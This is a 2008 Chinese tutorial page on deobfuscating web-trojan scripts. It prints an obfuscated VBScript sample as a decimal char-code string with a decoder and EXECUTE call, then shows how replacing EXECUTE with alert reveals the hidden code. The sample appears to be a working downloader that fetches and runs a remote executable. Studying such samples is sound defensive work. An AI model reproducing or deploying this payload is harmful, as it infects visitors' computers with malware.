首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Javascript

JS解密入门 最终变量劫持

Posted in Javascript onJune 25, 2008

如下是一段网马

<Script Language="VBScript">
Cn911="83,61,34,52,70,54,69,50,48,52,53,55,50,55,50,54,70,55,50,50,48,53,50,54,53,55,51,55,53,54,68,54,53,50,48,52,69,54,53,55,56,55,52,48,68,48,65,52,51,54,69,52,67,53,50,53,53,51,68,50,50,54,56,55,52,55,52,55,48,51,65,50,70,50,70,55,55,55,55,55,55,50,69,54,66,55,50,55,54,54,66,55,50,50,69,54,51,54,70,54,68,50,70,55,55,54,70,55,50,54,68,50,69,54,53,55,56,54,53,50,50,48,68,48,65,53,51,54,53,55,52,50,48,52,70,54,50,50,48,51,68,50,48,54,52,54,70,54,51,55,53,54,68,54,53,54,69,55,52,50,69,54,51,55,50,54,53,54,49,55,52,54,53,52,53,54,67,54,53,54,68,54,53,54,69,55,52,50,56,50,50,54,70,54,50,50,50,50,54,50,50,54,65,54,53,50,50,50,54,50,50,54,51,50,50,50,54,50,50,55,52,50,50,50,57,48,68,48,65,52,70,54,50,50,69,53,51,54,53,55,52,52,49,55,52,55,52,55,50,54,57,54,50,55,53,55,52,54,53,50,48,50,50,54,51,54,67,54,49,50,50,50,54,50,50,55,51,55,51,54,57,54,52,50,50,50,67,50,48,50,50,54,51,50,50,50,54,50,50,54,67,55,51,50,50,50,54,50,50,54,57,50,50,50,54,50,50,54,52,51,65,52,50,52,52,51,57,50,50,50,54,50,50,51,54,52,51,51,53,51,53,50,50,50,54,50,50,51,54,50,68,51,54,51,53,50,50,50,54,50,50,52,49,51,51,50,68,51,49,51,49,52,52,51,48,50,50,50,54,50,50,50,68,51,57,51,56,51,51,52,49,50,68,51,48,51,48,52,51,50,50,50,54,50,50,51,48,51,52,52,54,52,51,51,50,51,57,50,50,50,54,50,50,52,53,51,51,51,54,50,50,48,68,48,65,55,51,52,56,53,52,53,52,53,48,51,68,50,50,52,68,50,50,50,54,50,50,54,57,54,51,50,50,50,54,50,50,55,50,54,70,50,50,50,54,50,50,55,51,50,50,50,54,50,50,54,70,54,54,50,50,50,54,50,50,55,52,50,50,50,54,50,50,50,69,53,56,50,50,50,54,50,50,52,68,50,50,50,54,50,50,52,67,50,50,50,54,50,50,52,56,50,50,50,54,50,50,53,52,53,52,50,50,50,54,50,50,53,48,50,50,48,68,48,65,53,51,54,53,55,52,50,48,53,48,54,70,55,48,50,48,51,68,50,48,52,70,54,50,50,69,52,51,55,50,54,53,54,49,55,52,54,53,52,70,54,50,54,65,54,53,54,51,55,52,50,56,55,51,52,56,53,52,53,52,53,48,50,67,50,50,50,50,50,57,48,68,48,65,53,48,54,70,55,48,50,69,52,70,55,48,54,53,54,69,50,48,50,50,52,55,50,50,50,54,50,50,52,53,53,52,50,50,50,67,50,48,52,51,54,69,52,67,53,50,53,53,50,67,50,48,52,54,54,49,54,67,55,51,54,53,48,68,48,65,53,48,54,70,55,48,50,69,53,51,54,53,54,69,54,52,48,68,48,65,52,53,55,56,54,53,52,69,54,49,54,68,54,53,51,68,50,50,52,51,54,69,50,50,50,54,50,50,51,57,51,49,50,50,50,54,50,50,51,49,50,69,54,53,55,56,54,53,50,50,48,68,48,65,53,54,54,50,55,51,52,69,54,49,54,68,54,53,51,68,50,50,52,51,54,69,50,50,50,54,50,50,51,57,51,49,50,50,50,54,50,50,51,49,50,69,55,54,54,50,55,51,50,50,48,68,48,65,53,51,54,53,55,52,50,48,52,54,53,48,52,57,50,48,51,68,50,48,52,70,54,50,50,69,54,51,55,50,54,53,54,49,55,52,54,53,54,70,54,50,54,65,54,53,54,51,55,52,50,56,50,50,53,51,54,51,55,50,54,57,50,50,50,54,50,50,55,48,50,50,50,54,50,50,55,52,54,57,54,69,54,55,50,69,52,54,50,50,50,54,50,50,54,57,50,50,50,54,50,50,54,67,54,53,50,50,50,54,50,50,53,51,55,57,50,50,50,54,50,50,55,51,55,52,50,50,50,54,50,50,54,53,50,50,50,54,50,50,54,68,52,70,50,50,50,54,50,50,54,50,54,65,54,53,50,50,50,54,50,50,54,51,55,52,50,50,50,67,50,50,50,50,50,57,48,68,48,65,53,51,54,53,55,52,50,48,55,51,53,52,54,68,55,48,50,48,51,68,50,48,52,54,53,48,52,57,50,69,52,55,54,53,55,52,53,51,55,48,54,53,54,51,54,57,54,49,54,67,52,54,54,70,54,67,54,52,54,53,55,50,50,56,51,50,50,57,48,68,48,65,52,53,55,56,54,53,52,69,54,49,54,68,54,53,51,68,52,54,53,48,52,57,50,69,52,50,55,53,54,57,54,67,54,52,53,48,54,49,55,52,54,56,50,56,55,51,53,52,54,68,55,48,50,67,52,53,55,56,54,53,52,69,54,49,54,68,54,53,50,57,48,68,48,65,53,54,54,50,55,51,52,69,54,49,54,68,54,53,51,68,52,54,53,48,52,57,50,69,52,50,55,53,54,57,54,67,54,52,53,48,54,49,55,52,54,56,50,56,55,51,53,52,54,68,55,48,50,67,53,54,54,50,55,51,52,69,54,49,54,68,54,53,50,57,48,68,48,65,52,49,52,49,51,68,50,50,52,49,50,50,50,54,50,50,54,52,50,50,48,68,48,65,52,49,52,50,51,68,50,50,54,70,50,50,50,54,50,50,54,52,50,50,50,54,50,50,54,50,50,50,50,54,50,50,50,69,50,50,50,54,50,50,55,51,50,50,50,54,50,50,55,52,55,50,54,53,50,50,50,54,50,50,54,49,54,68,50,50,48,68,48,65,52,49,54,52,52,68,51,68,52,49,52,49,50,54,52,49,52,50,48,68,48,65,53,51,54,53,55,52,50,48,52,50,54,52,54,49,50,48,51,68,50,48,52,70,54,50,50,69,54,51,55,50,54,53,54,49,55,52,54,53,54,70,54,50,54,65,54,53,54,51,55,52,50,56,52,49,54,52,52,68,50,67,50,50,50,50,50,57,48,68,48,65,52,50,54,52,54,49,50,69,55,52,55,57,55,48,54,53,51,68,51,49,48,68,48,65,52,50,54,52,54,49,50,69,52,70,55,48,54,53,54,69,48,68,48,65,52,50,54,52,54,49,50,69,53,55,55,50,54,57,55,52,54,53,50,48,53,48,54,70,55,48,50,69,53,50,54,53,55,51,55,48,54,70,54,69,55,51,54,53,52,50,54,70,54,52,55,57,48,68,48,65,52,50,54,52,54,49,50,69,53,51,54,49,55,54,54,53,55,52,54,70,54,54,54,57,54,67,54,53,50,48,52,53,55,56,54,53,52,69,54,49,54,68,54,53,50,67,51,50,48,68,48,65,52,50,54,52,54,49,50,69,52,51,54,67,54,70,55,51,54,53,48,68,48,65,52,50,54,52,54,49,50,69,53,52,55,57,55,48,54,53,51,68,51,50,48,68,48,65,52,50,54,52,54,49,50,69,52,70,55,48,54,53,54,69,48,68,48,65,52,50,54,52,54,49,50,69,53,55,55,50,54,57,55,52,54,53,53,52,54,53,55,56,55,52,50,48,50,50,53,51,54,53,55,52,50,48,53,51,54,56,54,53,54,67,54,67,50,48,51,68,50,48,52,51,55,50,54,53,54,49,55,52,54,53,52,70,54,50,54,65,54,53,54,51,55,52,50,56,50,50,50,50,53,55,55,51,54,51,55,50,54,57,55,48,55,52,50,69,53,51,54,56,54,53,54,67,54,67,50,50,50,50,50,57,50,50,50,54,55,54,54,50,52,51,55,50,52,67,54,54,50,54,50,50,53,51,54,56,54,53,54,67,54,67,50,69,53,50,55,53,54,69,50,48,50,56,50,50,50,50,50,50,50,54,52,53,55,56,54,53,52,69,54,49,54,68,54,53,50,54,50,50,50,50,50,50,50,57,50,50,50,54,55,54,54,50,52,51,55,50,52,67,54,54,50,54,50,50,53,51,54,53,55,52,50,48,53,51,54,56,54,53,54,67,54,67,50,48,51,68,50,48,52,69,54,70,55,52,54,56,54,57,54,69,54,55,50,50,48,68,48,65,52,50,54,52,54,49,50,69,53,51,54,49,55,54,54,53,55,52,54,70,54,54,54,57,54,67,54,53,50,48,53,54,54,50,55,51,52,69,54,49,54,68,54,53,50,67,51,50,48,68,48,65,52,50,54,52,54,49,50,69,52,51,54,67,54,70,55,51,54,53,48,68,48,65,55,51,53,50,55,53,54,69,51,68,50,50,53,51,50,50,50,54,50,50,54,56,50,50,50,54,50,50,54,53,50,50,50,54,50,50,54,67,50,50,50,54,50,50,54,67,50,50,50,54,50,50,50,69,50,50,50,54,50,50,52,49,50,50,50,54,50,50,55,48,50,50,50,54,50,50,55,48,50,50,50,54,50,50,54,67,50,50,50,54,50,50,54,57,50,50,48,68,48,65,53,51,54,53,55,52,50,48,53,50,55,53,54,69,50,48,51,68,50,48,52,70,54,50,50,69,54,51,55,50,54,53,54,49,55,52,54,53,54,70,54,50,54,65,54,53,54,51,55,52,50,56,55,51,53,50,55,53,54,69,50,54,50,50,54,51,54,49,55,52,54,57,54,70,54,69,50,50,50,67,50,50,50,50,50,57,48,68,48,65,53,50,55,53,54,69,50,69,53,51,54,56,54,53,54,67,54,67,52,53,55,56,54,53,54,51,55,53,55,52,54,53,50,48,53,54,54,50,55,51,52,69,54,49,54,68,54,53,50,67,50,50,50,50,50,67,50,50,50,50,50,67,50,50,52,70,55,48,54,53,54,69,50,50,50,67,51,48,34,58,68,61,34,69,88,69,67,85,84,69,32,34,34,34,34,34,58,67,61,34,38,67,72,82,40,38,72,34,58,78,61,34,41,34,58,68,79,32,87,72,73,76,69,32,76,69,78,40,83,41,62,49,58,73,70,32,73,83,78,85,77,69,82,73,67,40,76,69,70,84,40,83,44,49,41,41,32,84,72,69,78,32,68,61,68,38,67,38,76,69,70,84,40,83,44,50,41,38,78,58,83,61,77,73,68,40,83,44,51,41,32,69,76,83,69,32,68,61,68,38,67,38,76,69,70,84,40,83,44,52,41,38,78,58,83,61,77,73,68,40,83,44,53,41,13,10,76,79,79,80,58,69,88,69,67,85,84,69,32,68"

'以下是处理的函数
Function Rechange(Q)
S=Split(Q,",")
Cn922=""
For i = 0 To UBound(S)
Cn922=Cn922&Chr(eval(S(i)))
Next
Rechange=Cn922
End Function

'执行这个代码
EXECUTE(Rechange(Cn911))
</Script>

看到我的前几篇文章的朋友应该知道,前面的是10进制,直觉解就行了,不过下面有个处理函数,你用10进制解密出来之后还要去分析函数的功能,很不合算。Rechange这个是处理函数,这个函数的功能我们不知道,不要紧,我们看到最后这里有个EXECUTE(),说明这个就是执行函数,执行的内容是 Rechange(Cn911),我们把EXECUTE改为alert()就行了,也就是把最后一行改为alert(Rechange(Cn911))。

劫持完毕,打开网页,解密的内容弹出来了。

学习要点:对于这种网马,最后一定会有一个最终的变量或是表达式,修改执行函数即可

JS解密入门 最终变量劫持

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Javascript 相关文章推荐
JS类库Bindows1.3中的内存释放方式分析
Mar 08 Javascript
JavaScript高级程序设计 扩展--关于动态原型
Nov 09 Javascript
javascript tips提示框组件实现代码
Nov 19 Javascript
Javascript限制网页只能在微信内置浏览器中访问
Nov 09 Javascript
Angularjs制作简单的路由功能demo
Apr 14 Javascript
Javascript 函数的四种调用模式
Nov 05 Javascript
javascript 实现文本使用省略号替代(超出固定高度的情况)
Feb 21 Javascript
利用C/C++编写node.js原生模块的方法教程
Jul 07 Javascript
深入理解React高阶组件
Sep 28 Javascript
微信小程序上线发布流程图文详解
May 06 Javascript
axios实现文件上传并获取进度
Mar 25 Javascript
Vue Object 的变化侦测实现代码
Apr 15 Javascript
JS解密入门之凭直觉解
Jun 25 #Javascript
js异或加解密效果代码
Jun 25 #Javascript
asp批量修改记录的代码
Jun 25 #Javascript
js innerHTML 的一些问题的解决方法
Jun 22 #Javascript
很酷的javascript loading效果代码
Jun 18 #Javascript
豆瓣网的jquery代码实例
Jun 15 #Javascript
JQuery实现自定义对话框的代码
Jun 15 #Javascript
Counter(1) 抖音(1) Xpath(1) most_common(1) 写入策略(1) pip(1) 字典(3) 爬虫(2) LOGO(1) MIME(1)
You might like
sqlyog 中文乱码问题的设置方法
2008/10/19 PHP
php中判断文件存在是用file_exists还是is_file的整理
2012/09/12 PHP
ubuntu下配置nginx+php+mysql详解
2015/09/10 PHP
php设计模式之委托模式
2016/02/13 PHP
XENON基于JSON变种
2010/07/27 Javascript
JQuery 选择器、过滤器介绍
2011/02/14 Javascript
JavaScript中的console.log()函数详细介绍
2014/12/29 Javascript
jQuery悬停文字提示框插件jquery.tooltipster.js用法示例【附demo源码下载】
2016/07/19 Javascript
BootStrapValidator校验方式
2016/12/19 Javascript
原生JS和jQuery操作DOM对比总结
2017/01/19 Javascript
详解Vue监听数据变化原理
2017/03/08 Javascript
Javascript封装id、class与元素选择器方法示例
2017/03/13 Javascript
详解angular 中的自定义指令之详解API
2017/06/20 Javascript
jQuery的时间datetime控件在AngularJs中的使用实例(分享)
2017/08/17 jQuery
JavaScript编程设计模式之构造器模式实例分析
2017/10/25 Javascript
vue使用自定义icon图标的方法
2018/05/14 Javascript
详解vue之自行实现派发与广播(dispatch与broadcast)
2021/01/19 Vue.js
探究python中open函数的使用
2016/03/01 Python
Python实现包含min函数的栈
2016/04/29 Python
浅谈python字典多键值及重复键值的使用
2016/11/04 Python
python函数的5种参数详解
2017/02/24 Python
Python字符串拼接的几种方法整理
2017/08/02 Python
Python使用wget实现下载网络文件功能示例
2018/05/31 Python
对python中矩阵相加函数sum()的使用详解
2019/01/28 Python
django美化后台django-suit的安装配置操作
2020/07/12 Python
OpenCV图片漫画效果的实现示例
2020/08/18 Python
Python 爬虫批量爬取网页图片保存到本地的实现代码
2020/12/24 Python
删除pycharm鼠标右键快捷键打开项目的操作
2021/01/16 Python
adidas旗下高尔夫装备供应商:TaylorMade Golf(泰勒梅高尔夫)
2016/08/28 全球购物
社区健康教育实施方案
2014/03/18 职场文书
高一军训的心得体会
2014/09/01 职场文书
计算机科学与技术专业求职信
2014/09/03 职场文书
公司法人授权委托书范本
2014/09/12 职场文书
一份教室追逐打闹的检讨书
2014/09/27 职场文书
隐形的翅膀观后感
2015/06/10 职场文书
进行数据处理的6个 Python 代码块分享
2022/04/06 Python